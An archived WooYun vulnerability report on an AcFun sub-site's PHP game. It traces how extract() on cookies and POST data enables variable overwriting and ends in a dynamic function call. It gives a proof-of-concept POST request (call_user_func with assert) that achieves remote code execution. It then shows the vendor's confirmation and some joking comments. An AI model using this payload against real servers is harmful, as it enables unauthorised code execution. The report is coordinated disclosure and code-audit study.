当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(16) 关注此漏洞

缺陷编号: WooYun-2013-23693

漏洞标题: ACFUN分站再次GETSHELL变量覆盖漏洞分析与利用

相关厂商: 杭州游趣网络有限公司

漏洞作者: N1ghtBird

提交时间: 2013-05-14 08:36

公开时间: 2013-06-28 08:37

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 远程代码执行 代码审计

3人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-14: 细节已通知厂商并且等待厂商处理中
2013-05-14: 厂商已经确认,细节仅向厂商公开
2013-05-24: 细节向核心白帽子及相关领域专家公开
2013-06-03: 细节向普通白帽子公开
2013-06-13: 细节向实习白帽子公开
2013-06-28: 细节向公众公开

简要描述:

最近在学代码审计..找个软柿子下手= 3 =.

感谢@t00000by57 提供的利用思路.

详细说明:

但常在河边走哪有不湿鞋?extract + global早晚是要出问题的..



直接进入正题:

\include\common.inc.php -Line12

code 区域
require GAME_ROOT.'./include/global.func.php';


error_reporting(E_ALL);


set_error_handler('gameerrorhandler');


$magic_quotes_gpc = get_magic_quotes_gpc();


extract(gstrfilter($_COOKIE));


extract(gstrfilter($_POST));


$_GET = gstrfilter($_GET);


$_REQUEST = gstrfilter($_REQUEST);


$_FILES = gstrfilter($_FILES);//哈?





require GAME_ROOT.'./config.inc.php';



后引入config避免覆盖重要变量.



gstrfilter过滤:

\include\global.inc.php -Line48

code 区域
function gstrfilter($str) {


	if(is_array($str)) {


		foreach($str as $key => $val) {


			$str[$key] = gstrfilter($val);


		}


	} else {		


		if($GLOBALS['magic_quotes_gpc']) {


			$str = stripslashes($str);


		}


		$str = str_replace("'","",$str);//屏蔽单引号'


		$str = str_replace("\\","",$str);//屏蔽反斜杠/


		$str = htmlspecialchars($str,ENT_COMPAT);//转义html特殊字符,即"<>&


	}


	return $str;


}





重要变量靠'现取现用'再加上过滤就可以从一定程度上避免因为偷懒拼接sqlquery产生的问题了..至少在大部分代码中没问题..





关键在这里:

\command.php -Line3

code 区域
require './include/common.inc.php';


//$t_s=getmicrotime();


//require_once GAME_ROOT.'./include/JSON.php';


require GAME_ROOT.'./include/game.func.php';


require config('combatcfg',$gamecfg);



\command.php -Line92

code 区域
if($mode !== 'combat' && $mode !== 'corpse' && strpos($action,'pacorpse')===false && $mode !== 'senditem'){


			$action = '';


		}


		if($command == 'menu') {


			$mode = 'command';


			$action = '';


		} elseif($mode == 'command') {


			if($command == 'move') {


				include_once GAME_ROOT.'./include/game/search.func.php';


				move($moveto);


				if($coldtimeon){$cmdcdtime=$movecoldtime;}


			} elseif($command == 'search') {


				include_once GAME_ROOT.'./include/game/search.func.php';


				search();


				if($coldtimeon){$cmdcdtime=$searchcoldtime;}


			} elseif(strpos($command,'itm') === 0) {


				include_once GAME_ROOT.'./include/game/item.func.php';


				$item = substr($command,3);


				itemuse($item);


				if($coldtimeon){$cmdcdtime=$itemusecoldtime;}


			} elseif(strpos($command,'rest') === 0) {


				if($command=='rest3' && !in_array($pls,$hospitals)){


					$log .= '<span class="yellow">你所在的位置并非医院,不能静养!</span><br>';


				}else{


					$state = substr($command,4,1);


					$mode = 'rest';


				}


			} elseif($command == 'itemmain') {


				$mode = $itemcmd;


			} elseif($command == 'song') {


				$sname=trim(trim($art,'【'),'】');


				include_once GAME_ROOT.'./include/game/song.inc.php';


				//$log.=$sname;


				sing($sname);


			}elseif($command == 'sync') {


				include_once GAME_ROOT.'./include/game/special.func.php';


				syncro($sp_cmd);


				$mode='command';


			}elseif($command == 'special') {


				if($sp_cmd == 'sp_word'){


					include_once GAME_ROOT.'./include/game/special.func.php';


					getword();


					$mode = $sp_cmd;


				}elseif($sp_cmd == 'sp_adtsk'){


					include_once GAME_ROOT.'./include/game/special.func.php';


					adtsk();


					$mode = 'command';


				}elseif($sp_cmd == 'sp_pbomb'){


					$mode = 'sp_pbomb';


				}elseif($sp_cmd == 'sp_weapon'){


					include_once GAME_ROOT.'./include/game/special.func.php';


					weaponswap();


					$mode = 'command';


					if($coldtimeon){$cmdcdtime=$weaponswapcoldtime;}


				}elseif($sp_cmd == 'oneonone'){


					$mode='oneonone';


				}elseif($sp_cmd == 'sp_skpts'){


					include_once GAME_ROOT.'./include/game/clubskills.func.php';


					calcskills($skarr);


					$p12[1]=1; $p12[2]=2;


					$mode='sp_skpts';


				}else{


					$mode = $sp_cmd;


				}


				


			} elseif($command == 'team') {


				include_once GAME_ROOT.'./include/game/team.func.php';


				if($teamcmd == 'teamquit') {				


					teamquit();


				} else{


					teamcheck();


				}


			}


   //省略一部分..直接进入最后逻辑


		} elseif($mode == 'senditem') {


			include_once GAME_ROOT.'./include/game/battle.func.php';


			senditem();


		} elseif($mode == 'combat') {


			include_once GAME_ROOT.'./include/game/combat.func.php';


			combat(1,$command);


		} elseif($mode == 'rest') {


			include_once GAME_ROOT.'./include/state.func.php';


			rest($command);


//		} elseif($mode == 'chgpassword') {


//			include_once GAME_ROOT.'./include/game/special.func.php';


//			chgpassword($oldpswd,$newpswd,$newpswd2);


//		} elseif($mode == 'chgword') {


//			include_once GAME_ROOT.'./include/game/special.func.php';


//			chgword($newmotto,$newlastword,$newkillmsg);


		} elseif($mode == 'corpse') {


			include_once GAME_ROOT.'./include/game/itemmain.func.php';


			getcorpse($command);


		} elseif($mode == 'team') {


			include_once GAME_ROOT.'./include/game/team.func.php';


			$command($nteamID,$nteamPass);//<----------


		}





team.func.php中存在两个方法,建立队伍function teammake($tID,$tPass)和加入队伍 function teamjoin($tID,$tPass),依靠$command传来的指令选择,但是感觉像是程序员在偷懒的时候忘记了上面extract解包?





漏洞证明:

构造请求:

$_POST['mode']='team',

$_POST['command']='call_user_func',

$_POST['nteamID']='assert',

$_POST['nteamPass']='phpinfo()'。



20130514032312.png







修复方案:

别偷懒..

版权声明:转载请注明来源 N1ghtBird@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-05-14 09:19

厂商回复:

已向大逃杀通报

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-05-14 09:05 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)
    0

    老搞acfun,等着收offer?

    1# 回复此人
  2. 2013-05-14 09:30 | N1ghtBird ( 普通白帽子 | Rank:113 漏洞数:23 | _(:з」∠)_)
    0

    人家不要咱...(

    2# 回复此人
  3. 2013-05-14 09:53 | 某因幡 ( 实习白帽子 | Rank:43 漏洞数:8 | 兔子一只。)
    0

    猴子表示送香蕉还是送基佬?

    3# 回复此人
  4. 2013-06-14 21:12 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)
    0

    猴基也被暴后庭了..

    4# 回复此人

登录后才能发表评论,请先 登录